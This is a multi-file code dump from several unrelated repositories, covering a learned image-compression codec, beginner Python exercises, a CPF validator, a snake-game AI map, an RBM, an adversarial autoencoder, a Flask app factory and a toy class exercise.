# HYPERPRIOR -> concat luma and chroma
self.h_a = nn.Sequential(
conv(M, N, stride=1, kernel_size=3),
nn.ReLU(inplace=True),
conv(N, N),
nn.ReLU(inplace=True),
conv(N, N),
)
self.h_s = nn.Sequential(
deconv(N, N),
nn.ReLU(inplace=True),
deconv(N, N),
nn.ReLU(inplace=True),
conv(N, M, stride=1, kernel_size=3),
nn.ReLU(inplace=True),
)
self.gaussian_conditional = GaussianConditional(None)
self.N = int(N)
self.M = int(M)
def forward(self, x):
x_yuv = self.rgb2yuv(x).squeeze(0) # shape: [1, 3, w, h]
x_luma, x_u, x_v = x_yuv.chunk(3, 1) # y, u, v -> [1, 1, w, h]
x_chroma = torch.cat((x_u, x_v), dim=1) # uv -> [1, 2, w, h]
y_luma = self.g_a_luma(x_luma) # [1, M/2, w/16, h/16]
y_chroma = self.g_a_chroma(x_chroma) # [1, M/2, w/16, h/16]
y = torch.cat((y_luma, y_chroma), dim=1) # [1, M, w/16, h/16]
z = self.h_a(torch.abs(y))
z_hat, z_likelihoods = self.entropy_bottleneck(z)
scales_hat = self.h_s(z_hat)
y_hat, y_likelihoods = self.gaussian_conditional(y, scales_hat) # [1, M, w/16, h/16]
y_hat_luma1, y_hat_luma2, y_hat_u, y_hat_v = y_hat.chunk(4, 1) # [1, M/4, w/16, h/16]
y_hat_luma = torch.cat((y_hat_luma1, y_hat_luma2), dim=1) # [1, M/2, w/16, h/16]
y_hat_chroma = torch.cat((y_hat_u, y_hat_v), dim=1) # [1, M/2, w/16, h/16]
x_hat_luma = self.g_s_luma(y_hat_luma)
x_hat_chroma = self.g_s_chroma(y_hat_chroma)
x_hat_yuv = torch.cat((x_hat_luma, x_hat_chroma), dim=1)
x_hat = self.yuv2rgb(x_hat_yuv)
return {
"x_hat": x_hat,
"likelihoods": {"y": y_likelihoods, "z": z_likelihoods},
}
def load_state_dict(self, state_dict):
# Dynamically update the entropy bottleneck buffers related to the CDFs
update_registered_buffers(
self.entropy_bottleneck,
"entropy_bottleneck",
["_quantized_cdf", "_offset", "_cdf_length"],
state_dict,
)
update_registered_buffers(
self.gaussian_conditional,
"gaussian_conditional",
["_quantized_cdf", "_offset", "_cdf_length", "scale_table"],
state_dict,
)
super().load_state_dict(state_dict)
@classmethod
def from_state_dict(cls, state_dict):
"""Return a new model instance from `state_dict`."""
N = state_dict["g_a_luma.0.weight"].size(0) * 2
M = state_dict["g_a_luma.6.weight"].size(0) * 2
net = cls(N, M)
net.load_state_dict(state_dict)
return net
def update(self, scale_table=None, force=False):
if scale_table is None:
scale_table = get_scale_table()
self.gaussian_conditional.update_scale_table(scale_table, force=force)
super().update(force=force)
def compress(self, x):
x_yuv = self.rgb2yuv(x) # shape: [1, 3, w, h]
x_luma, x_u, x_v = x_yuv.chunk(3, 1) # y, u, v -> [1, 1, w, h]
x_chroma = torch.cat((x_u, x_v), dim=1) # uv -> [1, 2, w, h]
y_luma = self.g_a_luma(x_luma) # [1, M/2, w/16, h/16]
y_chroma = self.g_a_chroma(x_chroma) # [1, M/2, w/16, h/16]
y = torch.cat((y_luma, y_chroma), dim=1) # [1, M, w/16, h/16]
z = self.h_a(torch.abs(y))
z_strings = self.entropy_bottleneck.compress(z)
z_hat = self.entropy_bottleneck.decompress(z_strings, z.size()[-2:])
scales_hat = self.h_s(z_hat)
indexes = self.gaussian_conditional.build_indexes(scales_hat)
y_strings = self.gaussian_conditional.compress(y, indexes)
return {"strings": [y_strings, z_strings], "shape": z.size()[-2:]}
def decompress(self, strings, shape):
assert isinstance(strings, list) and len(strings) == 2
z_hat = self.entropy_bottleneck.decompress(strings[1], shape)
scales_hat = self.h_s(z_hat)
indexes = self.gaussian_conditional.build_indexes(scales_hat)
y_hat = self.gaussian_conditional.decompress(strings[0], indexes)
y_hat_luma1, y_hat_luma2, y_hat_u, y_hat_v = y_hat.chunk(4, 1) # [1, M/4, w/16, h/16]
y_hat_luma = torch.cat((y_hat_luma1, y_hat_luma2), dim=1) # [1, M/2, w/16, h/16]
y_hat_chroma = torch.cat((y_hat_u, y_hat_v), dim=1) # [1, M/2, w/16, h/16]
x_hat_luma = self.g_s_luma(y_hat_luma)
x_hat_chroma = self.g_s_chroma(y_hat_chroma)
x_hat_chroma = torch.cat((x_hat_luma, x_hat_chroma), dim=1)
x_hat = self.yuv2rgb(x_hat_chroma)
return {"x_hat": x_hat}
def inverse_dict(d):
# We assume dict values are unique...
assert len(d.keys()) == len(set(d.keys()))
return {v: k for k, v in d.items()}
def filesize(filepath: str) -> int:
if not Path(filepath).is_file():
raise ValueError(f'Invalid file "{filepath}".')
return Path(filepath).stat().st_size
def load_image(filepath: str) -> Image.Image:
return Image.open(filepath).convert("RGB")
def img2torch(img: Image.Image) -> torch.Tensor:
return ToTensor()(img).unsqueeze(0)
def torch2img(x: torch.Tensor) -> Image.Image:
return ToPILImage()(x.clamp_(0, 1).squeeze())
def write_uints(fd, values, fmt=">{:d}I"):
fd.write(struct.pack(fmt.format(len(values)), *values))
def write_uchars(fd, values, fmt=">{:d}B"):
fd.write(struct.pack(fmt.format(len(values)), *values))
def read_uints(fd, n, fmt=">{:d}I"):
sz = struct.calcsize("I")
return struct.unpack(fmt.format(n), fd.read(n * sz))
def read_uchars(fd, n, fmt=">{:d}B"):
sz = struct.calcsize("B")
return struct.unpack(fmt.format(n), fd.read(n * sz))
def write_bytes(fd, values, fmt=">{:d}s"):
if len(values) == 0:
return
fd.write(struct.pack(fmt.format(len(values)), values))
def read_bytes(fd, n, fmt=">{:d}s"):
sz = struct.calcsize("s")
return struct.unpack(fmt.format(n), fd.read(n * sz))[0]
def get_header(model_name, metric, quality):
"""Format header information:
- 1 byte for model id
- 4 bits for metric
- 4 bits for quality param
"""
metric = 0
code = (metric << 4) | (quality - 1 & 0x0F)
return 0, code
#return model_ids[model_name], code
def parse_header(header):
"""Read header information from 2 bytes:
- 1 byte for model id
- 4 bits for metric
- 4 bits for quality param
"""
model_id, code = header
quality = (code & 0x0F) + 1
metric = code >> 4
return (
"YUV",
inverse_dict(metric_ids)[metric],
quality,
)
def pad(x, p=2 ** 6):
h, w = x.size(2), x.size(3)
H = (h + p - 1) // p * p
W = (w + p - 1) // p * p
padding_left = (W - w) // 2
padding_right = W - w - padding_left
padding_top = (H - h) // 2
padding_bottom = H - h - padding_top
return F.pad(
x,
(padding_left, padding_right, padding_top, padding_bottom),
mode="constant",
value=0,
)
def crop(x, size):
H, W = x.size(2), x.size(3)
h, w = size
padding_left = (W - w) // 2
padding_right = W - w - padding_left
padding_top = (H - h) // 2
padding_bottom = H - h - padding_top
return F.pad(
x,
(-padding_left, -padding_right, -padding_top, -padding_bottom),
mode="constant",
value=0,
)
def _encode(image, metric, quality, coder, output):
compressai.set_entropy_coder(coder)
#def _encode(image, quality, output, metric="mse"):
enc_start = time.time()
img = load_image(image)
start = time.time()
checkpoint_path = "../params/{}/checkpoint.pth.tar".format(quality)
state_dict = torch.load(checkpoint_path)["state_dict"]
net = ScaleHyperprior_YUV(192, 320)
net.load_state_dict(state_dict)
net = net.eval()
net.update()
load_time = time.time() - start
x = img2torch(img)
h, w = x.size(2), x.size(3)
p = 64 # maximum 6 strides of 2
x = pad(x, p)
with torch.no_grad():
out = net.compress(x)
shape = out["shape"]
header = get_header("YUV", metric, quality)
with Path(output).open("wb") as f:
write_uchars(f, header)
# write original image size
write_uints(f, (h, w))
# write shape and number of encoded latents
write_uints(f, (shape[0], shape[1], len(out["strings"])))
for s in out["strings"]:
write_uints(f, (len(s[0]),))
write_bytes(f, s[0])
enc_time = time.time() - enc_start
size = filesize(output)
bpp = float(size) * 8 / (img.size[0] * img.size[1])
print(
f"{bpp:.3f} bpp |"
f" Encoded in {enc_time:.2f}s (model loading: {load_time:.2f}s)"
)
def _decode(inputpath, coder, show, output=None):
compressai.set_entropy_coder(coder)
#def _decode(inputpath, show, output=None):
dec_start = time.time()
with Path(inputpath).open("rb") as f:
model, metric, quality = parse_header(read_uchars(f, 2))
original_size = read_uints(f, 2)
shape = read_uints(f, 2)
strings = []
n_strings = read_uints(f, 1)[0]
for _ in range(n_strings):
s = read_bytes(f, read_uints(f, 1)[0])
strings.append([s])
print(f"Model: {model:s}, metric: {metric:s}, quality: {quality:d}")
start = time.time()
checkpoint_path = "../params/{}/checkpoint.pth.tar".format(quality)
state_dict = torch.load(checkpoint_path)["state_dict"]
net = ScaleHyperprior_YUV(192, 320)
net.load_state_dict(state_dict)
net = net.eval()
net.update()
load_time = time.time() - start
with torch.no_grad():
out = net.decompress(strings, shape)
x_hat = crop(out["x_hat"], original_size)
img = torch2img(x_hat)
dec_time = time.time() - dec_start
print(f"Decoded in {dec_time:.2f}s (model loading: {load_time:.2f}s)")
if show:
show_image(img)
if output is not None:
img.save(output)
def encode(argv):
parser = argparse.ArgumentParser(description="Encode image to bit-stream")
parser.add_argument("image", type=str)
parser.add_argument(
"-m",
"--metric",
choices=["mse"],
default="mse",
help="metric trained against (default: %(default)s",
)
parser.add_argument(
"-q",
"--quality",
choices=list(range(1, 4)),
type=int,
default=3,
help="Quality setting (default: %(default)s)",
)
parser.add_argument(
"-c",
"--coder",
choices=compressai.available_entropy_coders(),
default=compressai.available_entropy_coders()[0],
help="Entropy coder (default: %(default)s)",
)
parser.add_argument("-o", "--output", help="Output path")
args = parser.parse_args(argv)
if not args.output:
args.output = Path(Path(args.image).resolve().name).with_suffix(".bin")
_encode(args.image, args.metric, args.quality, args.coder, args.output)
def decode(argv):
parser = argparse.ArgumentParser(description="Decode bit-stream to imager")
parser.add_argument("input", type=str)
parser.add_argument(
"-c",
"--coder",
choices=compressai.available_entropy_coders(),
default=compressai.available_entropy_coders()[0],
help="Entropy coder (default: %(default)s)",
)
parser.add_argument("--show", action="store_true")
parser.add_argument("-o", "--output", help="Output path")
args = parser.parse_args(argv)
_decode(args.input, args.coder, args.show, args.output)
def parse_args(argv):
parser = argparse.ArgumentParser(description="")
parser.add_argument("command", choices=["encode", "decode"])
args = parser.parse_args(argv)
return args
def main(argv):
args = parse_args(argv[1:2])
argv = argv[2:]
torch.set_num_threads(1) # just to be sure
if args.command == "encode":
encode(argv)
elif args.command == "decode":
decode(argv)
if __name__ == "__main__":
main(sys.argv)
``` |
{
"source": "0Fernando0/CursoPython",
"score": 4
} |
#### File: PARTE_3/EX022/index.py
```python
def escreva(esc):
a = '~'
while len(a) != len(esc):
a += '~'
print(a)
print(esc)
print(a)
escreva('Fernando')
```
#### File: PARTE_3/EX023/index.py
```python
for c in range(1,11,1):
print(f'{c}',end=' ')
print('FIM')
for c in range(10,-1,-2):
print(f'{c}',end=' ')
print('FIM')
print('agora é sua vez de personalizar a contagem!')
us = int(input('inicio: '))
us2 = int(input('fim: '))
us3 = int(input('intervalo: '))
def contador(us,us2,us3):
if us > us2 and us3 == 0:
for c in range(us,us2-1,-1):
print(f'{c}',end=' ')
print('FIM')
else:
if us3 == 0:
for c in range(us,us2+1,1):
print(f'{c}',end=' ')
print('FIM')
elif us > us2:
for c in range(us,us2-1,-us3):
print(f'{c}',end=' ')
print('FIM')
else:
for c in range(us,us2+1,us3):
print(f'{c}',end=' ')
print('FIM')
contador(us,us2,us3)
```
#### File: PARTE_3/EX026/index.py
```python
from datetime import date
def voto(n):
from datetime import time
idade = date.today().year - n
if idade >= 16 and idade < 18 or idade > 60:
return print(f'com {idade} anos: VOTO OPCIONAL!')
elif idade >= 18 and idade <= 60:
return print(f'com {idade} anos: VOTO OBRIGATORIO!')
else:
return print(f'com {idade} anos: VOTO NEGADO!')
voto(int(input('Em que ano você nasceu? ')))
```
#### File: Portifolio/validador_cpf/back_end.py
```python
def validar_cpf(cpf):
numero_cpf = cpf[:-2] #cpf sem os 2 ultimos números
soma = soma_2 = 0 #variavel para somar os numeros do laço
#laço para verificar numeros de numeros_cpf
for p,numero in enumerate(range(10,1,-1)): #laço range com enumerate que começa no 10 e vai reduzindo 1 ate chegar no 2
soma += int(numero_cpf[p])*numero #variavel soma que pega o inteiro(do numero_cpf[na posição 0,1,2...]) vezes o numero(10,9,8...)
res_1 = 11 - (soma % 11) #variavel que realiza o calculo de validação
numero_cpf += str(res_1) #agora adicionei em forma de string o calculo acima no numero_cpf
for c,valor in enumerate(range(11,1,-1)): #outro laço, faz a mesma coisa que o laço acima com a alteração que começa no 11
soma_2 += int(numero_cpf[c]) * valor #faz a mesmo que a outra variavel soma
res_2 = 11 - (soma_2 % 11) # tambem realiza o mesmo calculo que o res_1
numero_cpf += str(res_2) # novamente adicionei em string o res_2 ao numero_cpf
#verificando se o numero_cpf é igual(==) ao cpf de entranda da função
print('CPF VALIDO') if numero_cpf == cpf else print('CPF INVALIDO')
return
``` |
{
"source": "0Franky/snAIke",
"score": 4
} |
#### File: 0Franky/snAIke/map.py
```python
import traceback
import math
import random
import numpy as np
from snake import *
class Map:
"""Map class"""
def __init__(self, snake):
self.structure = MAP # matrix of 0 and 1 representing the map
self.snake = snake # snake evolving in the map
self.food = [random.randint(8, 12), random.randint(8, 12)] # food (list of 2 coordinates)
def update(self):
"""
Checks for collision between snake's head and walls or food
Takes the right action in case of collision
"""
snake_head_x, snake_head_y = self.snake.head
snake_pos = self.structure[snake_head_y][snake_head_x]
# print("snake_head_x POST")
# print(snake_head_x)
if [snake_head_x, snake_head_y] == self.food: # if snake's head is on food
self.snake.grow() # snake grows and new food is created
self.add_food(random.randint(0, SPRITE_NUMBER - 1),
random.randint(0, SPRITE_NUMBER - 1))
elif snake_pos == WALL: # if snake's head is on wall, snek is ded
self.snake.alive = False
def add_food(self, block_x, block_y):
"""
Adds food on (block_x, block_y) position
"""
self.food = [block_x, block_y]
try:
if self.structure[block_x][block_y] == 0: # checks if food will spawn in a free space (no wall, wall bad)
for i in self.snake.body: # checks if food will spawn where the snake is
if i == [block_x, block_y]:
print('Food spawned in snek, respawning...')
self.add_food(random.randint(0, SPRITE_NUMBER - 1), random.randint(0, SPRITE_NUMBER - 1))
else:
print('Food spawned in wall, respawning...')
self.add_food(random.randint(0, SPRITE_NUMBER - 1), random.randint(0, SPRITE_NUMBER - 1))
except Exception:
traceback.print_exc()
pygame.quit()
def render(self, window):
"""
Renders the map (background, walls and food) on the game window and calls render() of snake
Very very very unoptimized since render does not affect the genetic algorithm
:param window: surface window
"""
wall = pygame.image.load(IMAGE_WALL).convert() # loading images
food = pygame.image.load(IMAGE_FOOD).convert_alpha()
window.fill([0,0,0]) # painting background
num_line = 0
for line in self.structure: # running through the map structure
num_case = 0
for sprite in line:
x = num_case * SPRITE_SIZE
y = num_line * SPRITE_SIZE
if sprite == 1: # displaying wall
window.blit(wall, (x, y))
if self.food == [num_case, num_line]: # displaying food
window.blit(food, (x, y))
num_case += 1
num_line += 1
self.snake.render(window) # snake will be rendered on above the map
def scan(self):
"""
Scans the snake's environment into the 'scan' variable (list of lists) and gives it to snake's vision
Notes:
- 7 first inputs are for walls, 7 next for food, 7 last for itself (its body)
- Food is seen across all the map, walls and body are seen in range of 10 blocks max
- This method is long and I do not factorise much for performance issues,
the structure is easily understandable anyway
:return: nothing but gives vision to the snake
"""
def scan_wall(direction_x, direction_y, direction_range):
"""
Looks for a wall in the direction given in parameters for 10 steps max
I decided to use inner methods for a compromise between performance and factorisation
:param direction_x: direction in x axis, can be 1, 0 or -1 for "right", "stay" and "left" respectively
:param direction_y: direction in y axis, can be 1, 0 or -1 for "down", "stay" and "up" respectively
:param direction_range: maximum range to scan
:return: number with 0 value if nothing or 1/distance to wall if wall's detected
"""
res = 0
for i in range(1, 10): # looking up to 10 blocks max
step_x = head_x + i * direction_x # coordinates of next block to check
step_y = head_y + i * direction_y
if i < direction_range:
if structure[step_y][step_x] == WALL: # if wall is detected in current block
res = 1 / distance((head_x, head_y), (step_x, step_y)) # returns 1/distance to the block
return res
def scan_self(direction_x, direction_y, direction_range):
"""
Looks for a snake's body block in the direction given in parameters for 10 steps max
:params see "scan_wall", same params
:return: number with 0 value if nothing or 1/distance to body if a body block is detected
"""
res = 0
for i in range(1, 10):
step_x = head_x + i * direction_x
step_y = head_y + i * direction_y
if i < direction_range:
if [step_x, step_y] in snake_body:
res = max(res, 1 / distance((head_x, head_y), (step_x, step_y)))
return res
def scan_food(direction_x, direction_y, direction_range):
"""
Looks for food in the direction given in parameters until range is reached
:params see "scan_wall", same params
:return: number with 0 value if nothing or 1/distance to body if a body block is detected
"""
res = 0
for i in range(1, direction_range):
if food_x == (head_x + i * direction_x) and food_y == (head_y + i * direction_y):
res = 1
return res
scan = [[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0]] # default value
structure = self.structure
snake_body = self.snake.body # making local variables for readability and performance
head_x = self.snake.head[0]
head_y = self.snake.head[1]
food_x = self.food[0]
food_y = self.food[1]
forward_x = self.snake.direction[0] # calculating each coordinate for each 7 directions
forward_y = self.snake.direction[1] # since the snake sees in FIRST PERSON
right_x = -forward_y
right_y = forward_x
left_x = forward_y # for example, if snake's looking in [1,0] direction (down)
left_y = -forward_x # its left is [1,0] (right for us because we look from above)
forward_right_x = forward_x + right_x
forward_right_y = forward_y + right_y
forward_left_x = forward_x + left_x
forward_left_y = forward_y + left_y # see snake.py class for better explanations
backward_right_x = -forward_left_x
backward_right_y = -forward_left_y
backward_left_x = -forward_right_x
backward_left_y = -forward_right_y
forward_range = (20 - (forward_x * head_x + forward_y * head_y) - 1) % 19 + 1 # computing max range
backward_range = 21 - forward_range # for each direction
right_range = (20 - (right_x * head_x + right_y * head_y) - 1) % 19 + 1
left_range = 21 - right_range
forward_right_range = min(forward_range, right_range) # values are hard encoded
forward_left_range = min(forward_range, left_range) # since I'm not planning on making it modifiable
backward_right_range = min(backward_range, right_range)
backward_left_range = min(backward_range, left_range)
scan[0][0] = scan_wall(forward_x, forward_y, forward_range) # scanning walls in all directions
scan[1][0] = scan_wall(right_x, right_y, right_range)
scan[2][0] = scan_wall(left_x, left_y, left_range)
scan[3][0] = scan_wall(forward_right_x, forward_right_y, forward_right_range)
scan[4][0] = scan_wall(forward_left_x, forward_left_y, forward_left_range)
scan[5][0] = scan_wall(backward_right_x, backward_right_y, backward_right_range)
scan[6][0] = scan_wall(backward_left_x, backward_left_y, backward_left_range)
scan[7][0] = scan_food(forward_x, forward_y, forward_range) # scanning food in all directions
scan[8][0] = scan_food(right_x, right_y, right_range)
scan[9][0] = scan_food(left_x, left_y, left_range)
scan[10][0] = scan_food(forward_right_x, forward_right_y, forward_right_range)
scan[11][0] = scan_food(forward_left_x, forward_left_y, forward_left_range)
scan[12][0] = scan_food(backward_right_x, backward_right_y, backward_right_range)
scan[13][0] = scan_food(backward_left_x, backward_left_y, backward_left_range)
scan[14][0] = scan_self(forward_x, forward_y, forward_range) # scanning body in all directions
scan[15][0] = scan_self(right_x, right_y, right_range)
scan[16][0] = scan_self(left_x, left_y, left_range)
scan[17][0] = scan_self(forward_right_x, forward_right_y, forward_right_range)
scan[18][0] = scan_self(forward_left_x, forward_left_y, forward_left_range)
scan[19][0] = scan_self(backward_right_x, backward_right_y, backward_right_range)
scan[20][0] = scan_self(backward_left_x, backward_left_y, backward_left_range)
self.snake.vision = scan # gives snake vision
@jit(nopython=True)
def distance(p1=None, p2=None):
"""
Gives euclidian distance between two points
@jit is used to speed up computation
:param p1: origin point
:param p2: end point
:return: distance
"""
return math.sqrt((p2[0] - p1[0]) ** 2 + (p2[1] - p1[1]) ** 2)
``` |
{
"source": "0-gb/Mind-Reading-AI",
"score": 3
} |
#### File: 0-gb/Mind-Reading-AI/main.py
```python
from sklearn.naive_bayes import GaussianNB
from tkinter import Tk, Label
import random
def get_id_dictionary(allowed_symbols_local):
vocab = sorted(set(allowed_symbols_local))
constructed_char_2_int = {}
constructed_int_2_char = {}
counter = 0
for letter in vocab:
constructed_char_2_int[letter] = counter
constructed_int_2_char[counter] = letter
counter += 1
return constructed_char_2_int, constructed_int_2_char
def preprocess_char(char):
global correct_count
selected_key = char_2_int[char.capitalize()]
prediction_correct = predicted_key == selected_key
if prediction_correct:
correct_count += 1
return selected_key, prediction_correct, correct_count
def step_preprocess_x_y(learn_X, learn_Y, selected_key):
learn_X.pop(0)
learn_Y.pop(0)
learn_X.append(X_advanced)
learn_Y.append(selected_key)
return learn_X, learn_Y
def create_next_x(learn_X, selected_key, prediction_correct):
X_advanced = learn_X[-1][1:-1]
X_advanced.append(selected_key)
X_advanced.append(prediction_correct)
return X_advanced
def texts_from_metrics(selected_key, predicted_key, accuracy, window_accuracy, window_size):
global int_2_char
output_text1 = "Chosen - Prediction : " + int_2_char[selected_key] + " - " + int_2_char[predicted_key]
output_text2 = "Overall accuracy: {:.2f}".format(accuracy)
output_text3 = "Last {} guesses accuracy: {:.2f}".format(window_size, window_accuracy)
output_text4 = ""
if accuracy > 1 / 3:
output_text4 += "Human successfully predicted by AI "
else:
output_text4 += "Human not successfully predicted by AI"
return [output_text1, output_text2, output_text3, output_text4]
def process_key_press(event):
if event.char not in 'rspRSP' or len(event.char) < 1:
return
global case_counter, predicted_key, X_advanced, correctness_hist, learn_X, learn_Y
selected_key, prediction_correct, accurate_guesses = preprocess_char(event.char)
learn_X, learn_Y = step_preprocess_x_y(learn_X, learn_Y, selected_key)
case_counter += 1
accuracy = accurate_guesses / case_counter
correctness_hist.append(prediction_correct)
window_accuracy = sum(correctness_hist[-window_size:]) / min(case_counter, window_size)
X_advanced = create_next_x(learn_X, selected_key, prediction_correct)
output_texts = texts_from_metrics(selected_key, predicted_key, accuracy, window_accuracy, window_size)
w1 = Label(root, text=output_texts[0], anchor="w", width=300)
w2 = Label(root, text=output_texts[1], anchor="w", width=300)
w3 = Label(root, text=output_texts[2], anchor="w", width=300)
w4 = Label(root, text=output_texts[3], anchor="w", width=300)
w1.place(x=10, y=10)
w2.place(x=10, y=30)
w3.place(x=10, y=50)
w4.place(x=10, y=70)
clf.partial_fit([learn_X[-1]] * case_counter, [learn_Y[-1]] * case_counter)
predicted_key = clf.predict([X_advanced])[0]
allowed_symbols = 'RPS'
char_2_int, int_2_char = get_id_dictionary(allowed_symbols)
correctness_hist = []
window_size = 100
work_list = [char_2_int[element] for element in
','.join(random.choice(allowed_symbols) for _ in range(2 * window_size)).split(',')]
learn_X = [work_list[i:i + window_size] for i in range(0, len(work_list) - window_size)]
for i in range(0, len(work_list) - window_size):
learn_X[i].append(random.randint(0, 1))
learn_Y = work_list[window_size:]
predicted_key = char_2_int[random.choice(allowed_symbols)]
X_advanced = create_next_x(learn_X, learn_Y[-1], predicted_key)
correct_count, case_counter = 0, 0
clf = GaussianNB()
clf.fit(learn_X, learn_Y)
root = Tk()
root.geometry('600x100')
root.bind("<Key>", process_key_press)
root.mainloop()
``` |
{
"source": "0Gemini0/generative-models",
"score": 3
} |
#### File: RBM/RBM_binary_cd/rbm_binary_cd.py
```python
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
from tensorflow.examples.tutorials.mnist import input_data
if not os.path.exists('out/'):
os.makedirs('out/')
mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True)
X_dim = mnist.train.images.shape[1]
y_dim = mnist.train.labels.shape[1]
mb_size = 16
h_dim = 36
W = np.random.randn(X_dim, h_dim) * 0.001
def sigm(x):
return 1/(1 + np.exp(-x))
def infer(X):
# mb_size x x_dim -> mb_size x h_dim
return sigm(X @ W)
def generate(H):
# mb_size x h_dim -> mb_size x x_dim
return sigm(H @ W.T)
# Contrastive Divergence
# ----------------------
# Approximate the log partition gradient Gibbs sampling
alpha = 0.1
K = 10 # Num. of Gibbs sampling step
for t in range(1, 101):
X_mb = (mnist.train.next_batch(mb_size)[0] > 0.5).astype(np.float)
g = 0
for v in X_mb:
# E[h|v,W]
mu = infer(v)
# Gibbs sampling steps
# --------------------
v_prime = np.copy(v)
for k in range(K):
# h ~ p(h|v,W)
h_prime = np.random.binomial(n=1, p=infer(v_prime))
# v ~ p(v|h,W)
v_prime = np.random.binomial(n=1, p=generate(h_prime))
# E[h|v',W]
mu_prime = infer(v_prime)
# Compute data gradient
grad_w = np.outer(v, mu) - np.outer(v_prime, mu_prime)
# Accumulate minibatch gradient
g += grad_w
W += (alpha/t) / mb_size * g
# Visualization
# -------------
def plot(samples, size, name):
size = int(size)
fig = plt.figure(figsize=(4, 4))
gs = gridspec.GridSpec(4, 4)
gs.update(wspace=0.05, hspace=0.05)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample.reshape(size, size), cmap='Greys_r')
plt.savefig('out/{}.png'.format(name), bbox_inches='tight')
plt.close(fig)
X = (mnist.test.next_batch(mb_size)[0] > 0.5).astype(np.float)
H = np.random.binomial(n=1, p=infer(X))
plot(H, np.sqrt(h_dim), 'H')
X_recon = np.random.binomial(n=1, p=generate(H))
plot(X_recon, np.sqrt(X_dim), 'V')
```
#### File: VAE/adversarial_autoencoder/aae_pytorch.py
```python
import torch
import torch.nn
import torch.nn.functional as nn
import torch.autograd as autograd
import torch.optim as optim
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
from torch.autograd import Variable
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True)
mb_size = 32
z_dim = 5
X_dim = mnist.train.images.shape[1]
y_dim = mnist.train.labels.shape[1]
h_dim = 128
cnt = 0
lr = 1e-3
# Encoder
Q = torch.nn.Sequential(
torch.nn.Linear(X_dim, h_dim),
torch.nn.ReLU(),
torch.nn.Linear(h_dim, z_dim)
)
# Decoder
P = torch.nn.Sequential(
torch.nn.Linear(z_dim, h_dim),
torch.nn.ReLU(),
torch.nn.Linear(h_dim, X_dim),
torch.nn.Sigmoid()
)
# Discriminator
D = torch.nn.Sequential(
torch.nn.Linear(z_dim, h_dim),
torch.nn.ReLU(),
torch.nn.Linear(h_dim, 1),
torch.nn.Sigmoid()
)
def reset_grad():
Q.zero_grad()
P.zero_grad()
D.zero_grad()
def sample_X(size, include_y=False):
X, y = mnist.train.next_batch(size)
X = Variable(torch.from_numpy(X))
if include_y:
y = np.argmax(y, axis=1).astype(np.int)
y = Variable(torch.from_numpy(y))
return X, y
return X
Q_solver = optim.Adam(Q.parameters(), lr=lr)
P_solver = optim.Adam(P.parameters(), lr=lr)
D_solver = optim.Adam(D.parameters(), lr=lr)
for it in range(1000000):
X = sample_X(mb_size)
""" Reconstruction phase """
z_sample = Q(X)
X_sample = P(z_sample)
recon_loss = nn.binary_cross_entropy(X_sample, X)
recon_loss.backward()
P_solver.step()
Q_solver.step()
reset_grad()
""" Regularization phase """
# Discriminator
z_real = Variable(torch.randn(mb_size, z_dim))
z_fake = Q(X)
D_real = D(z_real)
D_fake = D(z_fake)
D_loss = -torch.mean(torch.log(D_real) + torch.log(1 - D_fake))
D_loss.backward()
D_solver.step()
reset_grad()
# Generator
z_fake = Q(X)
D_fake = D(z_fake)
G_loss = -torch.mean(torch.log(D_fake))
G_loss.backward()
Q_solver.step()
reset_grad()
# Print and plot every now and then
if it % 1000 == 0:
print('Iter-{}; D_loss: {:.4}; G_loss: {:.4}; recon_loss: {:.4}'
.format(it, D_loss.data[0], G_loss.data[0], recon_loss.data[0]))
samples = P(z_real).data.numpy()[:16]
fig = plt.figure(figsize=(4, 4))
gs = gridspec.GridSpec(4, 4)
gs.update(wspace=0.05, hspace=0.05)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample.reshape(28, 28), cmap='Greys_r')
if not os.path.exists('out/'):
os.makedirs('out/')
plt.savefig('out/{}.png'
.format(str(cnt).zfill(3)), bbox_inches='tight')
cnt += 1
plt.close(fig)
``` |
{
"source": "0gener/flask-shopping-list",
"score": 3
} |
#### File: flask-shopping-list/application/__init__.py
```python
from flask import Flask
from flask_restful import Api
from flask_sqlalchemy import SQLAlchemy
from instance.config import app_config
api = Api()
db = SQLAlchemy()
def create_app(config):
app = Flask(__name__, instance_relative_config=True)
app.config.from_object(app_config[config])
db.init_app(app)
api.init_app(app)
return app
``` |
{
"source": "0gjimenez/Final_Exam001",
"score": 4
} |
#### File: 0gjimenez/Final_Exam001/three.py
```python
def tell_story():
a = Bird()
b = Dragon()
c = Gorilla()
# Generate as many other objects as you want
d = Beetle()
e = Chipmunk()
f = Snake()
g = Cobra()
h = Goat()
i = Sheep()
j = Donkey()
k = Pig()
# Have objects interact
e.eat(g)
b.eat(d)
b.eat(h)
j.eat(b)
# replace the replace_me_object
replace_me_object = b
final_phrase = replace_me_object.talk()
return final_phrase
class Animal:
def __init__(self):
self.phrase = ""
def eat(self, other):
self.phrase += str(other.phrase)
def talk(self):
return self.phrase
class Beetle(Animal):
def __init__(self):
super().__init__()
self.phrase = "ztrauq kcalb"
class Bird(Animal):
def __init__(self):
super().__init__()
self.phrase = "Tweet"
class Dragon(Animal):
def __init__(self):
super().__init__()
def eat(self, other):
self.phrase = str(other.phrase[::-1])
def talk(self):
return self.phrase[0::2]
class Gorilla(Animal):
def __init__(self):
super().__init__()
self.phrase = "123456789"
def beat(self, other1, other2):
self.phrase = str(other1.phrase) + " " + str(other2.phrase)
class Chipmunk(Animal):
def __init__(self):
super().__init__()
self.phrase = "Munchd"
def eat(self,other):
self.phrase = str(other.phrase[0])
class Snake(Animal):
def __init__(self):
super().__init__()
self.phrase = "Hiss"
def eat(self,other):
self.phrase = str(other.phrase).toLower()
class Cobra(Animal):
def __init__(self):
super().__init__()
self.phrase = "Snorflek"
def eat(self,other):
self.phrase = str(other.phrase).toUpper()
class Goat(Animal):
def __init__(self):
super().__init__()
